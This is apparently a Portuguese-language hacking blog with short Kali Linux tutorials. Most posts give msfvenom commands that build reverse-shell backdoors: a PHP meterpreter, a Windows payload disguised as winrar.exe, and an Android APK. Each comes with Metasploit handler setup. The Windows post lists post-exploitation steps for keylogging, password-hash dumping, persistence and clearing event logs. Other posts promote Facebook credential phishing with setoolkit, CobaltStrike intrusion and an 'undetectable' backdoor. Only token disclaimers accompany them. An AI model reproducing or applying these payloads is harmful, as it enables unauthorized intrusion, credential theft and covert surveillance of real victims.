Pentest

Pentest

Exclusivo para Pentest

Explorando Vulnerabilidade de “upload” com BURP “kali linux”

0

Boas users!

Irei mostrar como explorar uma vulnerabilidade, de um determinado servidor de upload com o BURP.

Comando:

# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.108 LPORT=4444 -e      php/base64 -f raw > /root/upload.php

By user777

 

Hackeando as Credenciais do facebook “setoolkit” kali linux

0

Boas Users!

Irei repassar uma forma de pegar, as credenciais do facebook com uma ferramenta chamda “setoolkit”.

“Todas as informações aqui devem ser usadas para fins educacionais e que a invasão de dispositivos não autorizado é crime”

 

Bem pessoal, essa foi uma pequena demonstração de como estamos vulneráveis, com
Participação do nosso amigo Thiago!!!!

By user777

 

 

PasteRock Kali Linux

0

Boas Users!

 

Ja mostrei essa técnica aqui, mas hoje irei mostrar de um modo diferente.

 

 

PasteRock LINK

By User777

Invadindo com CobaltStrike ( kali Linux )

2

Boas Users!

Hoje irei mostrar como acessar um computador “windows” com o CobaltStrike

“Todas as informações aqui devem ser usadas para fins educacionais e que a invasão de dispositivos não autorizado é crime”

Comandos utilizados:

$ cd

cd= Navegar entre os diretórios

$ sudo ./teamserver 127.0.0.1 123456

sudo= Permissão de super usuário

./teamserver= Iniciando servidor do cobalt strike

127.0.0.1= IP LoopBack

123456= Senha

$ sudo ./cobaltstrike

./cobaltstrike= Iniciando o cobaltstrike

 

Fonte:

https://www.cobaltstrike.com/features

Softwares usados:

CobaltStrike

Toycon

Resource Hacker

 

By user777

Personalizando terminal “Kali Linux”

0

Boas Users!

Hoje vou ensinar, como personalizar o terminal do kali linux, muito simples.

 

Comandos Utilizados:

Antes de mais nada, entrar no diretório inicial do usuário:

# cd ~
# leafpad .user777

leafpad = editor de texto padrão do kali linux

.user777= nome do arquivo que escolhi, coloque o nome que achar melhor, mas não esquecendo do (.) ponto no inicio do arquivo, assim ele fica oculto no sistema.

# chmod +x

chmod= gerencia as permissões no linux

+x= Permissão de execução

# leafpad .bashrc

.bashrc= Arquivo do terminal

# cat ~/.user777

cat= lista um arquivo na tela

~= diretório inicial do usuário

Links dos geradores:

http://patorjk.com/software/taag/#p=d

http://joshua.einhyrning.com/wtfig/

 

By user777

 

 

 

ARDUINO PRO MICRO – ‘USB RUBBER DUCKY’ – V 1.0

0
Pro Micro

Pessoal, vamos aqui dar uma olhadinha em alguns pontos do nosso vídeo sobre o Arduino Pro Micro…
Como eu já havia dito no Artigo sobre o Digispark eu faria algo sobre o Arduino, bem similar porém por se tratar de um dispositivo de maior performance, não quando falamos de processamento, mas em diversos outros fatores, inclusive pela aplicação.
Certo, que o vídeo tenha sido de alguma valia e eu acredito que tenha sido, eu vou aqui abordar alguns assuntos que não foram abordados no vídeo pois o deixaria com um tamanho muito grande e até cansativo para todos nós. Ok?

 

Um dos Tópicos que gostaria de abordar, porém não tive oportunidade era sobre as especificações do Pro-Micro. Então, deixo para vocês o link do datasheet do carinha.

https://cdn.sparkfun.com/datasheets/Dev/Arduino/Boards/ProMicro16MHzv1.pdf

 

Outros que eram para ter sido debatido era as instruções dos códigos usados, e rapaz, se você já tem algum conhecimento não terá alguma dificuldade, mas caso não tenha eu realmente reforço o que disse no vídeo, leia um pouco sobre.

O primeiro código:

No primeiro código que escrevi, e enviei ao Arduino no vídeo nós realizamos uma simples execução, abrir um navegador e depois abrir um site, especificamente o prefirolinux.com.
Este foi o código(primeiro) usado por mim no vídeo.

Depois disso, mostrei um código um pouco maior, também realizei a conexão ao kali e de forma clara acredito ter falado um pouco sobre o Arduino Reverse Shell Generator( ).
Este por sua vez, facilitou muito o processo realizado naquele instante, claro, não temos obrigatoriamente que criar todos os arquivos usando o shell generator.

Bom, depois de baixar o Programa e fazer todo aquele processo, faltará o código, e isso pode ser encontrado abaixo.

 

Este código, está configurado de forma a acessar um server especifico e abrir a shell.txt.

Caso for usar este código, faça as devidas alterações no link onde está hospedada sua shell… 😀

Com isso, basta seguir o passo a passo do vídeo e não terá como dar errado.

Para a mudanças de caracteres, farei um mapa das modificações em um post a parte e agradeço a todos pela visita.
Amanhã ou depois irei upar um novo vídeo, com mais recursos e novidades.

 

Abraços e até mais!! 😉

 

Invadindo Computador com kali Linux

5

Boas Users!

Antes de mais nada um recadinho;

“Todas as informações aqui devem ser usadas para fins educacionais e que a invasão de dispositivos não autorizado é crime”

OBS: ao criar o arquivo “.exe” do backdoor, tem que ser executado no computador com  windows.

Comandos executados no video;

$ sudo msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.101 lport=4444
-f exe -o /root/Downloads/winrar.exe

sudo = Privilegio de super usuário, ja que eu executei os comandos como usuário comum OBS: se utilizar o usuário “root” não precisa do “sudo”

windows/meterpreter/reverse_tcp= MeterPreter é um interpretador de comandos do metasploit framework.

msfvenom= para criar o nosso backdoor

-p= Payload “refere-se à parte de um vírus de computador que executa uma ação nociva”

lhost= o seu IP local do kali

lport= porta que vai ser executada

-f= format “formato do arquivo que criamos no caso foi exe”

-o= out “saída”

/root/Downloads= caminho que salvei o arquivo

winrar.exe= nome dado ao payload, pode-se dar qualquer nome ao seu payload, mas sempre com a extensão “exe”

$ sudo msfconsole

msfconsole= iniciando o modulo do programa

use exploit/multi/handler

use exploit/multi/handler= Carregando módulo a ser usado

set payload windows/meterpreter/reverse_tcp

set payload windows/meterpreter/reverse_tcp= método utilizado

set lhost

set lhost= inserir o ip do kali

set lport

set lport= inserir a porta a ser utilizada

exploit

exploit = execução do backdoor

 

Seguem-se agora algumas opções:

sysinfo – esse comando vai mostrar qual a versão do windows da máquina alvo.

getsystem – Eleva o nível de privilégio para SYSTEM

ipconfig – Mostra o endereço ip da máquina alvo

screenshot – Salva um arquivo JPEG com um print da tela do computador alvo

keyscan_start – Inicia o keylogger ou seja captura tudo que for digitado no teclado do computador alvo

keyscan_dump – Visualiza os dados capturados após o keyscan_start.

keyscan_stop – Para a captura

run persistence -X – Esse comando configura a máquina alvo para que a cada boot no sistema ela estabeleça novamente a conexão com a máquina atacante.

hashdump – faz a captura do hash de senhas do computador alvo.

execute – Executa um aplicativo ex. execute -f calc.exe

shell – Abre um prompt de comando

clearev – Limpa os logs de eventos do Windows, ou seja, apaga possíveis rastros deixados por vc.

 

By user777

 

Exploit Android 6 usando MSFvenom (Kali 2.2016)

0

Gente, nesse video eu mostro como com poucos comandos você pode explorar um Android na versão 6.0.
O video não tem intenção de ensinar ou induzir ninguém a invadir a privacidade de terceiros, mas sim demonstrar que falhas podem ser exploradas.

Usei apenas o msfvenom sem opções de encoder, arquitetura ou outros, basicamente apenas um exploit gerado pelo kali e que me deu acesso de forma reversa ao Android.
Aparelho : Moto G segunda Geração com android 6.0 com ultima atualização de segurança instalado.

Comandos usado neste video…
Criar o exploit, substitua ip pelo seu ip, porta pela devida porta e de o nome do app:
msfvenom -p android/meterpreter/reverse_tcp LHOST=IP LPORT=PORTA -o app.apk

Para estabelecer conexão :
msfconsole

use multi/handler

set payload android/meterpreter/reverse_tcp

set lhost IP_KALI

set lport porta

exploit -j ou run ou somente exploit

Bom, por hoje é só, logo mais mostro como deixar este exploit como algo que inicia todas as vezes que o dispositivo for ligado, obtendo assim um acesso monstro ao Android….rsrs
abraços

 

 

 

AVmod2 Backdoor 100% indetectável (Linux e Windows) Kali Linux

0

Boas users!

Irei mostrar mais uma técnica, backdoor que funciona para windows e linux, Spyrock Avmod2.

link https://github.com/Spyrock/AVMod2

By user777

 

 

 

 

[ x ]
 

Trace Mobile Kali Linux

0

Boas users!

 

Hoje estarei Disponibilizando um script em perl, para rastrear um IP mobile.

 

Link for perl – http://goo.gl/4ptqDk

By user777